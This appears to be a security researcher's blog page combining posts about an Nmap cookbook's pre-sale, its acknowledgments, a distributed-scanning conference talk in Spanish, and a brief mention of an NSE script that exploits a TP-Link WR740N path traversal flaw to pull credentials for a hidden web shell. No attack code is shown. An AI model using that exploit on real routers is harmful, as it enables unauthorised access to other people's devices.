calderonpale.com

I've been always fond of graphical data representation and Luis Martín Garcia shared something very cool today with the Nmap-development mailing list; the evolution of Nmap's source code.

I'm very pleased to inform you that "Nmap 6: Network Exploration and Security Auditing Cookbook" is on pre-sale now.

About the book

This book is for any security consultant, administrator or enthusiast looking to learn how to use and master Nmap and the Nmap Scripting Engine. It is divided in practical tasks or "recipes" with full code explanations, specific Nmap commands and images to illustrate the topics.

What will you learn from the recipes covered?

Nmap's functionality is vast. The following topics are covered in over 120 practical tasks included in this book:

• Nmap basics
• Host discovery techniques
• Information gathering tasks for pentesters
• Performing security checks to web, database and mail servers
• Implementing a host monitoring system with Nmap, Ndiff and Bash scripting
• Distributing Nmap scans among several clients
• Collecting HTTP header information
• Tuning scans
• Generating reports
• Writing your own scripts

For more recipes, visit the full table of content of 'Nmap 6: Network Exploration and Security Auditing'.

Pre-order your copy now!

PacktPub: Nmap 6: Network Exploration and Security Auditing Cookbook

PacktPub Open Source royalties

I thought I should let you know that PacktPub offers a porcentage of the sales back to the open source projects such as Nmap. That means that by buying the digital or printed version of this book you also help the Nmap project!

Acknowledgments

A lot of work is behind this publication and I would like to thank those people who deserve credit for their hard work ( I owe you a beer) :

• Fyodor: Thank you for guiding me through Google's Summer of Code. It was a great learning experience and no one of this would have happened without you.
• David Fifield: Thank you for all the help and sharing your expertise with me.
• Patrik Karlsson: Many of the scripts and libraries shown in this book were written by you. Keep up the awesome work!
• Tom Sellers: Thank you for your support and help with testing things!
• Patrick Donnelly: Thank you for all the help with Lua.
• Djalal Harouni: Thank you for helping me with the Exim vulnerability
• Vlatko Kosturjak: Thank you for porting Nmap to Android!
• Henry Doreau: Thank you for all the hard work you've put into Nmap.
• Ange Gutek: Thank you for all the help with http-slowloris!
• Marc Ruef: Thank you for helping me with vulscan!
• Ron Bowes: Thank you for all your help
• Daniel Miller: Thank you for all your great contributions to Nmap!
• El draco: Thank you for sharing your knowledge of distributed scanning and letting me use Dnmap's official diagrams!
• Carlos Ayala: Thank you for your time while reviewing this book and sharing your IPS/IDS/FW expertise with me.
• Pedro Joaquín & Roberto Salgado: Thank you for all the extra work you had to put at Websec to cover me while I worked on this
• Renata Gomez: For sending the cover image of this book!
• Nmap community: Thank you to all of you from bug reporters to contributors. You all help Nmap be an excellent and very active open source project
• Packtpub: Thank you for the opportunity!

This is a demo I showed a few days ago where we use a path traversal vulnerability to obtain the credentials of a hidden web shell in devices TP-LINK WR740N.

I wrote a NSE script to exploit a path traversal vulnerability in several TP-Link access points.

Resources 

http-tplink-dir-traversal on Github

dotdotpwn log

Este pasado 21 de Abril tuve dí una platica sobre escaneo distribuido en GuadalajaraCON 2012. Hicimos el release de una versión especial para este evento de la herramienta Dnmap. Pueden descargar la presentación y el software desde los siguiente links:

http://www.guadalajaracon.org/wp-content/uploads/2012/04/GuadalajaraCONNmapDistribuidoSlides.pdf

http://guadalajaracon.org/dnmap.tar.gz